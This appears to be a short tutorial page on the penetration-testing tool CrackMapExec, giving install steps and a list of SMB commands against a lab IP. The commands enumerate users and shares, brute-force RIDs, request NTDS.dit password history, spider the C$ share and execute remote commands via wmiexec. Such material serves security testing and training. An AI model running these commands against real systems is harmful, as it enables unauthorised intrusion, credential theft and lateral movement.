Test tool-CrackMapExec-remotely execute Windows commands

Categories: , Tag:

Tool link: https://github.com/byt3bl33d3r/CrackMapExec

Install under Kali

apt-get install crackmapexec
apt-get install -y libssl-dev libffi-dev python-dev build-essential
pip install --user pipenv
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec && pipenv install
pipenv shell
python setup.py install

use

Enter the CrackMapExec directory and execute pipenv shell

Official example

https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference

test

#### List shares
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --shares
#### List conversations
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --sessions
#### List disk information
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --disks
#### List logged in users
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --loggedon-users
#### List domain users
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --users
#### List all users based on unique RID
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --rid-brute
#### List domain groups
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --groups
####  List local groups
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --local-groups
#### List domain password policies
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --pass-pol
#### Try empty session
cme smb 192.168.127.235 -u '' -p ''
#### List specified domain information
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -d LABNET
#### List historical information of ntds.dit
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --ntds-history
#### Crawling C drive directory information
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C\$ --pattern txt
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C\$

#### Remote command execution
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X '$PSVersionTable' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X '$set' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X '$whoami' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X 'whoami' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X 'ipconfig /all' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X 'tasklist /svc' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -x ipconfig

Reviews

There are no reviews yet.

Be the first to review “Test tool-CrackMapExec-remotely execute Windows commands”

Your email address will not be published. Required fields are marked *